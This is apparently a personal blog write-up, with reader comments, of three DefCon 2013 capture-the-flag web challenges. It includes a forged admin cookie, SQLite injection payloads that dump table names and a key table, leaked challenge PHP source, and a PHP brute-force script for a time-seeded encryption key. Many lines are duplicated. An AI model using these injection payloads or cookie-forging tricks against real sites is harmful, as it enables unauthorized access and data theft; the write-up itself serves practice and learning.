DefCon 2013 3dub - Web based challenges.
This is the first time 'm writing Wiriteup for any ctf [practice]. So please bare with it :D
3dub - 1
What ever name to enter in the username field will be accepted and you be logged in with that name.
After logging in you will get a message that LOGIN as admin.
After logging in you will get a message that LOGIN as admin.
but if give "admin" in the username field , You will get a message saying admin login disabled.
But for every login with different usernames the cookies where changing.
Observation -->
username cookie
a - 09
b - 0a
ab - 09ce
ba - 0acd
abc - 09cd29
aaaaaa - 09cd2994af
b - 0a
ab - 09ce
ba - 0acd
abc - 09cd29
aaaaaa - 09cd2994af
its just a hex based addition with the base "aaaaa". But no need to do the hex addition also.
get cookie for
admi - 09c8259c
aaaan- 09cd2994a0
=> admin - 09c8259ca0
save cookie and refresh, you get the key.
the key is The key is: who wants oatmeal raisin anyways twumpAdby
Easiest challenge in DefCon 2013.
3dub - 2
Login page.
Obviously tried SQL injection first. WORKED!
but i could login as root but no use because no key.
Obviously tried SQL injection first. WORKED!
but i could login as root but no use because no key.
Tried analysis the GET and POST requests in ZAP.
X-SQL : SELECT name FROM users WHERE name =' ' and pasword=' ' limit 1;
X-SQL : SELECT name FROM users WHERE name =' ' and pasword=' ' limit 1;
waste time crafting requests wrt to MySQL.
I could login as root and anynumber from 0 yo +Inf :D
I could login as root and anynumber from 0 yo +Inf :D
Afterwards i found it was SQLite. The done -
- asd'OR'1'='1' UNION SELECT name FROM sqlite_master WHERE type = "table"--I logged in as keys.
- asd'OR'1'='1' UNION SELECT name FROM keys --
got the key-
logged in as The key is: literally online lolling on line WucGesJi
3dub - 4
Was a easy one but wasted more than 6 hours in this still managed NOT to get the key. Like a BOSS XD
File name and the access code..
it opened for usernmaes.txt with accesscode - 60635c6862d44e8ac17dc5e144c66539.
But no access fro passwords.txt with the same accesscode.
Found that accesscode=md5(filename)
Opened the passwords.txt i was shocked to see everything was SHA-512/SALT hashing.
Thought i would move on to next one than decrypting these passwords.
But that would be lame to hash to that extent. That was a distraction. :p
Time to brute force the filename. Found
key.txt with accesscode - 65c2a527098e1f7747eec58e1925b453
But no access fro passwords.txt with the same accesscode.
Found that accesscode=md5(filename)
Opened the passwords.txt i was shocked to see everything was SHA-512/SALT hashing.
Thought i would move on to next one than decrypting these passwords.
But that would be lame to hash to that extent. That was a distraction. :p
Time to brute force the filename. Found
key.txt with accesscode - 65c2a527098e1f7747eec58e1925b453
Content of key.txt-
2GXuC0wS4O1MI8OpuoV1NkjsMM6zkzLpcQfOpMKniiogUoCS3yhTyZbm8a9BCEgHdl19bWEMziZiZDbLI+V2dQ==
2GXuC0wS4O1MI8OpuoV1NkjsMM6zkzLpcQfOpMKniiogUoCS3yhTyZbm8a9BCEgHdl19bWEMziZiZDbLI+V2dQ==
By looking at the content of key.txt it was base64. Decoded with online base64 deocder. Got invalid ascii code not the key!
content of key.txt was changing with time. Suspected functions - time() and rand().
Major time waste here.
content of key.txt was changing with time. Suspected functions - time() and rand().
Major time waste here.
Afterwards i gave the getfile.php which was helping us to opne the file.
getfile.php with accesscode- 0701593e23e676eaba834916a6ac7272.
Brute force script in PHP -
getfile.php with accesscode- 0701593e23e676eaba834916a6ac7272.
Contents of getfile.php-
Acces granted to getfile.php!
$value = time();
$filename = $_GET["filename"];
$accesscode = $_GET["accesscode"];
if (md5($filename) == $accesscode){
echo "Acces granted to $filename!
";
srand($value);
if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt'))==TRUE){
$data = file_get_contents($filename);
if ($data !== FALSE) {
if ($filename == "key.txt") {
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
echo base64_encode($cyphertext);
}
else{
echo nl2br($data);
}
}
else{
echo "File does not exist";
}
}
else{
echo "File does not exist";
}
}
else{
echo "Invalid access code";
}
?>
$value = time();
$filename = $_GET["filename"];
$accesscode = $_GET["accesscode"];
if (md5($filename) == $accesscode){
echo "Acces granted to $filename!
";
srand($value);
if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt'))==TRUE){
$data = file_get_contents($filename);
if ($data !== FALSE) {
if ($filename == "key.txt") {
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
echo base64_encode($cyphertext);
}
else{
echo nl2br($data);
}
}
else{
echo "File does not exist";
}
}
else{
echo "File does not exist";
}
}
else{
echo "Invalid access code";
}
?>
```````````````````````````````````````````````````
***k it! 'm going to sleep. But i dint. Because I have wasted a lot of time on this..
This needed a Brute force. No way for manually doing that.
***k it! 'm going to sleep. But i dint. Because I have wasted a lot of time on this..
This needed a Brute force. No way for manually doing that.
Brute force script in PHP -
<?php
error_reporting(0);
for ($key = 0; $key <= getrandmax(); $key++)
{
$text="5HHOwWMXYH5UxvzIzxqMY3vuwyCJ5BVdzwm5puqduZrsPTxfsFNKXXMlwhZj5W/1o Sv3ENrCpbIMF9cJQ5Gndg==";
$data=mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($text), MCRYPT_MODE_CBC);
echo $data;
echo "<br>";
}
?>
Dump of brute force.
Search for the string with starting "the key is".
No match found. No idea WHY?
Waiting for other Writeups from pros to find my mistake.
No match found. No idea WHY?
Waiting for other Writeups from pros to find my mistake.
Any suggestions, please comment.
Update on 18-06-2013-->
With the help of the comment by Célestin Perdu got to know where i had missed the point.
You can use ZAP or Burp Suite anything. Get the date and time of the response, convert it to linux timestamp.
$ date -d "which you got from the tool" +% s
Use this value as key. And you should get the flag.
Thanks for reading. Suggestion and comments welcomed!
Update on 18-06-2013-->
With the help of the comment by Célestin Perdu got to know where i had missed the point.
You can use ZAP or Burp Suite anything. Get the date and time of the response, convert it to linux timestamp.
$ date -d "which you got from the tool" +% s
Use this value as key. And you should get the flag.
Thanks for reading. Suggestion and comments welcomed!
null poisoning?
ReplyDeletekey.txt
No.. Just manipulating d accesscode will do.
DeleteIn 3dub-4, you're trying to bruteforce the key, which is not efficient.
ReplyDeleteIf you look at the algorithm, the key is generated by a rand() whose seed is generated by a time() call. In other words, to get the right key, you have to find at which time the key was generated, which is rather easy: bruteforce with time()±1000 for instance, and you will find the right one eventually.
oh yeah! i just concentrated on the encrypt and base64_encoder function. Didn't notice the srand($value).
Deleteappx time() then ±1000 brute force is needed. If we can get the accurate time by monitoring the packets then no brute force is needed
Thanks for the help...